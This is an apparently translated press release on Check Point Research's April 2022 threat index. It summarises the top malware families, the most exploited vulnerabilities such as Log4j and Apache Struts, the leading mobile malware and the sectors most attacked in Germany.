Emotet will remain unchallenged in April 2022
Check Point Research (CPR), the threat intelligence division of Check Point® Software Technologies Ltd. (NASDAQ: CHKP), has published the Global Threat Index for April 2022.
Emotet recorded a slight decline compared to March, when the Easter scams were added, but still remains at the top and hit 8.42 percent of all German companies and authorities recorded by Check Point. The decline this month may be partly due to Microsoft’s decision to disable certain macros related to Office files, which affects the way Emotet is usually delivered. However, there are reports that Emotet is being distributed via a new method: phishing emails that contain a OneDrive URL.
Also dangerous are the critical vulnerabilities in the Java Spring Framework, known as Spring4Shell, which appeared in March.
Maya Horowitz, Director of Threat Intelligence and Research and Products at Check Point
“As the cyber threat landscape is constantly changing and large companies, such as Microsoft, influence the parameters within which cyber criminals can operate, hackers need to become more creative in distributing their malware, as Emotet’s new method shows. In addition, the Spring4Shell vulnerability made headlines in April. Although it is not yet included in the top ten list of vulnerabilities, it has compromised over 35 percent of companies worldwide in the first month of its appearance alone, which is why we expect it to rise in the list of threats in the coming months,”explains Maya Horowitz, Director of Threat Intelligence and Research and Products at Check Point .
Top 3 Most Wanted Malware for Germany:
The arrows refer to the change in placement from the previous month.
Emotet is still in first place. Agent Tesla takes second place and FormBook takes third place.
- ↔ Emotet – Emotet is an advanced, self-propagating and modular Trojan. It was previously used as a banking Trojan, but currently serves as a propagator of other malicious programs or entire campaigns. He uses various methods to stay operational and knows evasive techniques to avoid detection. In addition, it can be spread through phishing emails that contain malicious attachments or links.
- ↑ Agent Tesla – AgentTesla is an advanced COUNCIL that acts as a keylogger and information thief and is able to monitor and collect the victim’s keystrokes and system keyboard, take screenshots and sneak credentials from a variety of software installed on the victim’s computer (including Google Chrome, Mozilla Firefox and the Microsoft Outlook email client).
- ↑ Formbook – FormBook is an infostealer that targets the Windows operating system and was first discovered in 2016. It is marketed in hacking forums as malware-as-a-Service (MaaS) because it knows strong evasion techniques and costs a fairly low price. FormBook collects and steals credentials from various web browsers, takes screenshots, monitors and logs keystrokes, and can download and run files from its C&C on instruction.
The Top 3 Most Wanted Vulnerabilities:
This month, the most exploited vulnerability is Web Server Exposed Git Repository Information Disclosure, which affects 46 percent of companies worldwide, followed by Apache Log4j Remote Code Execution (CVE-2021-44228), which has fallen from first to second place and also affects 46 percent of companies worldwide. Apache Strut’s ParametersInterceptor ClassLoader Security Bypass (CVE-2014-0094,CVE-2014-0112,CVE-2014-0113,CVE-2014-0114) is now in third place in the list of the most frequently exploited vulnerabilities, with a global impact of 45 percent.
- ↑ Web Server Exposed Git Repository Information Disclosure – A vulnerability has been reported in Git Repository that exposes information. The successful exploitation of this vulnerability could allow unintentional disclosure of account information.
- ↓ Apache Log4j Remote Code Execution (CVE-2021-44228) – There is a vulnerability in Apache Log4j that allows an attacker to execute malicious code at will.
- ↑ Apache Struts ParametersInterceptor ClassLoader Security Bypass (CVE-2014-0094,CVE-2014-0112,CVE-2014-0113,CVE-2014-0114) – There is a security vulnerability in Apache Struts that can be circumvented. The vulnerability is due to insufficient validation of the data processed by ParametersInterceptor, which allows manipulation of the classloader. A remote attacker could exploit this vulnerability by providing a class parameter in a request.
The Top 3 Most Wanted Mobile Malware:
This month, AlienBot remains the most common mobile malware. FluBot and xHelper exchange places.
- ↔ AlienBot – The AlienBot malware family is a malware-as-a-Service (MaaS) for Android devices that allows an attacker to smuggle criminal code into legitimate financial applications as a first step. The attacker gains access to the victims’ accounts and eventually takes complete control of their device.
- ↑ FluBot – FluBot is an Android malware that is spread via phishing SMS messages (smishing), which usually pretend to be logistics suppliers. As soon as the user clicks on the link in the message, he will be redirected to the download of a fake application containing FluBot. After installation, the malware has various functions for collecting login data and supporting the smishing operation itself, including uploading contact lists and sending SMS messages to other phone numbers.
- ↓ xHelper – A mobile malware that has been occurring since March 2019 and is used to download other contaminated apps and display advertisements. The application is able to hide from the user and can even reinstall itself if it has been uninstalled.
Top 3 of the attacked industries and areas in Germany:
- ↑ Software Vendor (Software provider).
- ↑ Education/Research.
- ↓ ISP/MSP.
Check Point’s Global Threat Impact Index and its ThreatCloud Map are based on Check Point’s ThreatCloud intelligence. ThreatCloud provides real-time threat data collected by hundreds of millions of sensors worldwide across networks, endpoints and mobile phones. This database is enriched by AI-based engines and exclusive research data from Check Point Research, the Intelligence & Research department of Check Point Software Technologies.